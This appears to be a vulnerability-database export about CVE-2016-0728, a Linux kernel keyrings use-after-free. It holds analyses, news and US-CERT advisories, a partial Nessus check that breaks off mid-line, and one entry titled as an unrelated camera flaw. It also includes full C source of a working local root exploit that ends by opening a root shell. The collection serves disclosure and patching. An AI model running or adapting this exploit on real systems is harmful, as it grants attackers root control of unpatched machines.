ASLR\uff0c\u53e6\u4e00\u4e2a\u662fUAF\u9020\u6210\u4ee3\u7801\u6267\u884c\uff0c\u5229\u7528\u7684\u662fKeyRing\u673a\u5236\u4e2d\u7684\u4e24\u4e2a\u6f0f\u6d1e\uff0c\u4e00\u4e2a\u662f\u5bf9Keyring\u64cd\u4f5c\u63a7\u5236\u4e0d\u4e25\u8c28\uff0c\u53e6\u4e00\u4e2a\u662f\u5229\u7528\u5bf9Keyring\u8ba1\u6570\u53d8\u91cf\u63a7\u5236\u4e0d\u4e25\u8c28\uff0c\u5176\u4e2d\u4ee3\u7801\u6267\u884c\u5229\u7528\u6761\u4ef6\u76f8\u5bf9\u82db\u523b\uff0c\u4e0b\u9762\u5bf9\u6b64\u6f0f\u6d1e\u8fdb\u884c\u8be6\u7ec6\u5206\u6790\u3002\r\n\r\nKeyring\u4fe1\u606f\u6cc4\u9732\uff1a\r\n\r\nKeyring\u548c\u5b89\u5168\u5bc6\u94a5\u6709\u5173\uff0c\u8fdb\u7a0b\u53ef\u4ee5\u7533\u8bf7\u81ea\u5df1\u65b0\u7684keyring\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u901a\u8fc7\u7533\u8bf7\u65b0\u7684keyring\u66ff\u6362\u8001\u7684keyring\uff0c\u5176\u4e2d\uff0c\u8c03\u7528\u5230join_session_keyring\u51fd\u6570\u3002\r\n\r\n```\r\nlong join_session_keyring(const char *name)\r\n{\r\n ...\r\n new = prepare_creds();\r\n ...\r\n keyring = find_keyring_by_name(name, false); //find_keyring_by_name increments keyring->usage if a keyring was found\r\n if (PTR_ERR(keyring) == -ENOKEY) {\r\n /* not found - try and create a new one */\r\n keyring = keyring_alloc(\r\n name, old->uid, old->gid, old,\r\n KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,\r\n KEY_ALLOC_IN_QUOTA, NULL);\r\n if (IS_ERR(keyring)) {\r\n ret = PTR_ERR(keyring);\r\n goto error2;\r\n }\r\n```\r\n\r\n\u8fd9\u91cc\u4f1a\u901a\u8fc7find_keyring_by_name\uff0c\u53bb\u67e5\u770b\u5f53\u524d\u8bf7\u6c42\u8fdb\u7a0b\u662f\u5426\u5df2\u7ecf\u5b58\u5728keyring\uff0c\u5982\u679c\u4e0d\u5b58\u5728\uff0c\u5219\u4f1a\u521b\u5efa\u4e00\u4e2a\u65b0\u7684keyring\uff0c\u800c\u5f53\u5b58\u5728\u65f6\uff0c\u5219\u4f1a\u6267\u884c\u4e0b\u9762\u7684\u51fd\u6570\u903b\u8f91\u3002\r\n\r\n```\r\n ret = install_session_keyring_to_cred(new, keyring);\r\n if (ret < 0)\r\n goto error2;\r\n commit_creds(new);\r\n mutex_unlock(&key_session_mutex);\r\n ret = keyring->serial;\r\n key_put(keyring);\r\n```\r\n\r\n\u4f1a\u5229\u7528\u65b0\u7684keyring\u66ff\u6362\u8001\u7684keyring\uff0c\u8fd9\u91cc\u90fd\u6ca1\u6709\u95ee\u9898\uff0c\u4f46\u662f\u6709\u53e6\u4e00\u4e2a\u51fd\u6570\u903b\u8f91\u662f\u5b58\u5728\u95ee\u9898\u7684\u5730\u65b9\u3002\r\n\r\n```\r\nelse if (keyring == new->session_keyring) {\r\n ret = 0;\r\n goto error2; //<-- The bug is here, skips key_put.\r\n }\r\n```\r\n\r\n\u5f53\u65b0\u7533\u8bf7\u7684keyring\u548c\u8001\u5f97keyring\u76f8\u7b49\u7684\u65f6\u5019\uff0c\u5219\u4f1a\u8df3\u8f6c\u5230error2\u6267\u884c\uff0c\u800c\u5728error2\u91cc\u3002\r\n\r\n```\r\nerror2:\r\n mutex_unlock(&key_session_mutex);\r\n```\r\n\r\n\u4f1a\u8c03\u7528mutex_unlock\u6cc4\u9732keryring\u7684\u5f15\u7528\u4fe1\u606f\uff0c\u9020\u6210\u4fe1\u606f\u6cc4\u9732\u3002\r\n\r\n\r\n\u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e\uff1a\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u53d1\u751f\u4e8ekeyring\u7684\u8ba1\u6570\u4e2d\uff0c\u8fd9\u4e2a\u8ba1\u6570\u5b58\u653e\u4e8e\u4e00\u4e2ausage\u6570\u636e\u57df\u4e2d\uff0c\u5f53\u6bcf\u6b21\u7533\u8bf7\u4e00\u6b21keyring\uff0c\u6570\u636e\u57df\u8ba1\u6570\u5c31\u4f1a\u52a01\uff0c\u8fd9\u4e2a\u6570\u636e\u57df\u662fatomic_t\u7c7b\u578b\uff0c\u4e5f\u5c31\u662f\u8bf4\u5b58\u5728\u4e0a\u9650\u3002\r\n\r\n\u800c\u5728\u6574\u4e2a\u8fc7\u7a0b\u4e2d\uff0c\u6ca1\u6709\u5bf9\u8fd9\u4e2a\u6570\u636e\u57df\u8ba1\u6570\u7684\u5927\u5c0f\u8fdb\u884c\u5224\u65ad\uff0c\u4ece\u800c\u5bfc\u81f4\u4e0d\u65ad\u7533\u8bf7keyring\u76f4\u81f3\u8d85\u8fc7\u6570\u636e\u57df\u5927\u5c0f\u7684\u65f6\u5019\uff0cusage\u4f1a\u7f6e0\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u4f1a\u91ca\u653ekeyring\uff0c\u800c\u8fd9\u4e2a\u8fc7\u7a0b\u4f1a\u4ea7\u751f\u4e00\u4e2a\u60ac\u5782\u6307\u9488\uff0c\u5728\u7533\u8bf7keyring\u7684\u65f6\u5019\uff0c\u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u8fd9\u4e2a\u8fc7\u7a0b\uff0c\u53ef\u4ee5\u8986\u76d6\u8fd9\u4e2a\u60ac\u5782\u6307\u9488\u3002\r\n\r\n\u8986\u76d6\u5185\u5bb9\u4f7f\u7528\u5185\u6838\u4ee3\u7801\uff0c\u5f53\u518d\u6b21\u5f15\u7528\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u5f15\u53d1\u4ee3\u7801\u6267\u884c\u3002", "published": "2016-05-20T00:00:00", "type": "seebug", "title": "Linux\u5185\u6838 Keyrings \u5f15\u7528\u8ba1\u6570\u6ea2\u51fa UAF \u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-05-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91603", "id": "SSV:91603", "sourceData": "\n # Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n \r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n \r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n \r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* \r\n_prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n \r\n \r\n \r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n \r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n exit(0);\r\n }\r\n \r\n ret = 0;\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n \r\n struct {\r\n long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n \r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n \r\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n prepare_kernel_cred = \r\n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = \r\n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 \r\n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n puts(\"[-] You probably need to change the address of \r\ncommit_creds and prepare_kernel_cred in source\");\r\n }\r\n \r\n my_key_type = malloc(sizeof(*my_key_type));\r\n \r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n \r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n \r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n \r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n \r\n keyring_name = argv[1];\r\n \r\n /* Set the new session keyring before we start */\r\n \r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \r\nKEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n \r\n puts(\"[+] Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n \r\n puts(\"[+] Finished increfing\");\r\n puts(\"[+] Forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring \r\nobject */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"[-] fork\");\r\n return -1;\r\n }\r\n \r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"[-] msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"[-] msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n \r\n puts(\"[+] Finished forking\");\r\n sleep(5);\r\n \r\n /* call userspace_revoke from kernel */\r\n puts(\"[+] Caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"[+] keyctl_revoke\");\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n \r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-91603", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:08:46", "description": "## Introduction\r\nThe Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered the vulnerability only recently, disclosed the details to the Kernel security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither us nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.\r\n\r\nIn this write-up, we\u2019ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.\r\n\r\n## The Bug\r\nCVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details, let\u2019s cover some background required to understand the bug.\r\n\r\nQuoting directly from its manpage, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces \u2013 keyctl syscall (there are two other syscalls that are used for handling keys: add_key and request_key. keyctl, however, is definitely the most important one for this write-up.) are provided so that userspace programs can manage those objects and use the facility for their own purposes.\r\n\r\nEach process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name) and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object\u2019s internal refcount, stored in a field called usage, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, the execution jumps to error2 label which skips the call to key_put and leaks the reference that was increased by find_keyring_by_name.\r\n\r\nTriggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:\r\n\r\nwhich results the following output having leaked-keyring 100 references:\r\n\r\n## Exploiting the Bug\r\nEven though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the reference count for the object is of type atomic_t, which under the hood, is basically an int \u2013 meaning 32-bit on both 32-bit and 64-bit architectures. While every integer is theoretically possible to overflow, this particular observation makes practical exploitation of this bug as a way to overflow the reference count seem feasible. And it turns out no checks are performed to prevent overflowing the usage field from wrapping around to 0.\r\n\r\nIf a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it after the kernel freed the object, it will cause the kernel to reference deallocated, or a reallocated memory. This way, we can achieve a use-after-free, by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps wouldn\u2019t surprise an experienced vulnerability researcher. The outline of the steps that to be executed by the exploit code is as follows:\r\n\r\n 1.Hold a (legitimate) reference to a key object\r\n 2.Overflow the same object\u2019s usage\r\n 3.Get the keyring object freed\r\n 4.Allocate a different kernel object from user-space, with a user-controlled content, over the same memory previously used by the freed keyring object\r\n 5.Use the reference to the old key object and trigger code execution\r\nStep 1 is completely out of the manpage, step 2 was explained earlier. Let\u2019s dive into the technical details of the rest of the steps.\r\n\r\n## Overflowing usage Refcount\r\nThis step is actually an extension of the bug. The usage field is of int type which means it has a max value of 2^32 both on 32-bit and 64-bit architectures. To overflow the usage field we have to loop the snippet above 2^32 times to get usage to zero.\r\n\r\n## Freeing keyring object\r\nThere are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem which frees any keyring object the moment the usage counter is 0.\r\n\r\nOne caveat though, if we look at the join_session_keyring function prepare_creds also increments the current session keyring and abort_creds or commit_creds decrements it respectively. The problem is that abort_creds doesn\u2019t decrement the keyring\u2019s usage field synchronically but it is called later using rcu job, which means we can overflow the usage counter without knowing it was overflowed. It is possible to solve this issue by using sleep(1) after each call to join_session_keyring, of course it is not feasible to sleep(2^32) seconds. A feasible work around will be to use a variation of the divide-and-conquer algorithm and to sleep after 2^31-1 calls, then after 2^30-1 etc\u2026 this way we never overflow unintentionally because the maximum value of refcount can be double the value it should be if no jobs where called.\r\n\r\n## Allocating and controlling kernel object\r\nHaving our process point to a freed keyring object, now we need to allocate a kernel object that will override the freed keyring object. That will be easy thanks to how SLAB memory works, allocating many objects of the keyring size just after the object is freed. We choose to use the Linux IPC subsystem to send messages of size 0xb8 \u2013 0x30 when 0xb8 is the size of the keyring object and 0x30 is the size of a message header.\r\n\r\n\r\nThis way we control the lower 0x88 bytes of the keyring object.\r\n\r\n## Gaining kernel code execution\r\nFrom here it\u2019s pretty easy thanks to the struct key_type inside the keyring object which contains many function pointers. An interesting function pointer is the revoke function pointer which can be invoked using the keyctl(KEY_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:\r\n\r\nThe keyring object should be filled as follows:\r\n\r\n\r\n\r\nThe uid and flags attributes should be filled that way to pass a few control check until the execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers with revoke pointing to a function that will be executed with root privileges. Here is a code snippet that demonstrates this.\r\n\r\nAddresses of commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device.\r\n\r\nNow the last step is of course:\r\n\r\nhere is a link to the full exploit which runs on kernel 3.18 64-bit, following is the output of running the full exploit which takes about 30 minutes to run on Intel Core i7-5500 CPU (Usually time is not an issue in a privilege escalation exploit):\r\n\r\n\r\n\r\n## Mitigations & Conclusions\r\nThe vulnerability affects any Linux Kernel version 3.8 and higher. SMEP & SMAP will make it difficult to exploit as well as SELinux on android devices. Maybe we\u2019ll talk about tricks to bypass those mitigation in upcoming blogs, anyway the most important thing for now is to patch it as soon as you can.", "published": "2016-01-28T00:00:00", "type": "seebug", "title": "ACTi E31 surveillance Cameras \u5f31\u5bc6\u7801\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90673", "id": "SSV:90673", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:43", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "[](<https://3.bp.blogspot.com/-S8Lo8NeHvOQ/Vp5yAJBQmWI/AAAAAAAAmRs/oDB6ZyBJA2M/s1600/linux-kernel-hacking.png>)\n\nA new critical zero-day vulnerability has been discovered in the** Linux kernel **that could allow attackers to gain root level privileges by running a malicious Android or Linux application on an affected device.\n\n \n\n\nThe critical Linux kernel flaw ([CVE-2016-0728](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-0728>)) has been identified by a group of researchers at a startup named Perception Point.\n\nThe vulnerability was present in the code since 2012, and affects any operating system with **Linux kernel 3.8 and higher**, so there are probably tens of millions of computers, both 32-bit and 64-bit, exposed to this flaw.\n\n \n\n\nHowever, the most bothersome part is that the problem affects **Android versions KitKat and higher**, which means about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw.\n\n \n\n\n \n\n\n### Impact of the Zero-Day Vulnerability\n\n \n\n\nAn attacker would only require local access to exploit the flaw on a Linux server.\n\n \n\n\nIf successfully exploited, the vulnerability can allow attackers to get root access to the operating system, enabling them to delete files, view private information, and install malicious apps.\n\n> _\"It's pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,\" _**Yevgeny Pats**, co-founder and CEO at security vendor Perception Point, said in a [blog post](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) published today. \n_\"With no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.\"_\n\nUsually, flaws in Linux kernel are patched as soon as they are found; therefore, Linux-based operating systems are considered to be more secure than others. However, zero-day vulnerability recently discovered in the Linux kernel made its way for almost 3 years.\n\n \n\n\n### The Cause of the Critical Linux Kernel Vulnerability\n\n[](<https://4.bp.blogspot.com/-L-rODbAqKbE/Vp5zlCS0lRI/AAAAAAAAmR4/VL1nAAdEK48/s1600/linux-root-exploit.png>)\n\nThe vulnerability is actually the result of a **Reference Leak** in the keyrings facility built into various flavors of Linux. The keyrings facility is primarily a way to encrypt and store login data, encryption keys and certificates, and then make them available to applications.\n\n \n\n\nHowever, a reference leak could be abused by attackers to ultimately execute arbitrary code in the Linux kernel.\n\n \n\n\nSo far, the researchers said, no exploits have been discovered in the wild that take advantage of this vulnerability.\n\n \n\n\nPerception Point has provided a technical analysis of the vulnerability and how one can exploit it, including [proof-of-concept](<https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f>) (PoC) exploit code published on its Github page.\n\n \n\n\n### Patch Expected to Roll Out Soon\n\n \n\n\nThe good news is that Perception Point has already reported the flaw to the Linux team, and patches are expected to roll out today to devices with automatic updates.\n\n \n\n\nHowever, it may take a little longer on Android devices to receive the patch, given the fact that most updates aren\u2019t pushed automatically by manufacturers and carriers. \n \n\n\n### **How Patch Linux Kernel Vulnerability (CVE-2016-0728)**\n\nType following commands as per your Linux distro:\n\n * **Debian or Ubuntu Linux:** sudo apt-get update && sudo apt-get upgrade\n * **RHEL / CentOS Linux:** sudo yum update\n\n \n\n\n \n\n\n### UPDATE \u2014 Kernel bug Not A Big Deal for Android Users\n\n \n\n\nNow, Google has claimed, as expected, that Perception Point claims \u2013 about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw \u2013 are not entirely accurate.\n\n \n\n\nAccording to the search engine giant, the number of Android devices affected by this zero-day flaw is significantly smaller than initially reported by Perception Point. \n\n> \"_We believe that no Nexus devices are vulnerable to exploitation by 3rd party applications. Further, devices with Android 5.0 and above are protected, as the Android SELinux policy prevents 3rd party applications from reaching the affected code_,\" [said](<https://plus.google.com/+AdrianLudwig/posts/KxHcLPgSPoY>) Adrian Ludwig, Android's lead security engineer.\n\n> \"_Also, many devices running Android 4.4 and earlier do not contain the vulnerable code introduced in Linux kernel 3.8, as those newer kernel versions not common on older Android devices._\ufeff\"\n\nThe company also added that it has prepared a patch that has already been released to open source and provided to partners, and that \"_the patch will be required on all devices with a security patch level of March 1, 2016, or greater._\"\n", "modified": "2016-01-22T06:43:02", "published": "2016-01-19T06:30:00", "id": "THN:2F321B0D3CF635D0F8D272948E9B31C9", "href": "https://thehackernews.com/2016/01/linux-kernel-hacker.html", "type": "thn", "title": "Zero-Day Flaw Found in 'Linux Kernel' leaves Millions Vulnerable", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2020-12-18T18:07:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "US-CERT is aware of a Linux kernel vulnerability affecting Linux PCs and servers and Android-based devices. Exploitation of this vulnerability may allow an attacker to take control of an affected system.\n\nUS-CERT recommends that users and administrators review the [Redhat Security Blog](<https://access.redhat.com/security/cve/CVE-2016-0728>) and the [Debian Security Bug Tracker](<https://security-tracker.debian.org/tracker/CVE-2016-0728>) for additional details and refer to their Linux or Unix-based OS vendors for appropriate patches.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2016/01/19/Linux-Kernel-Vulnerability>); we'd welcome your feedback.\n", "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "CISA:FCB4B9C4CB605F6B805399E8D3B54A48", "href": "https://us-cert.cisa.gov/ncas/current-activity/2016/01/19/Linux-Kernel-Vulnerability", "type": "cisa", "title": "Linux Kernel Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2"], "id": "UBUNTU_USN-2872-3.NASL", "href": "https://www.tenable.com/plugins/nessus/88016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88016);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! 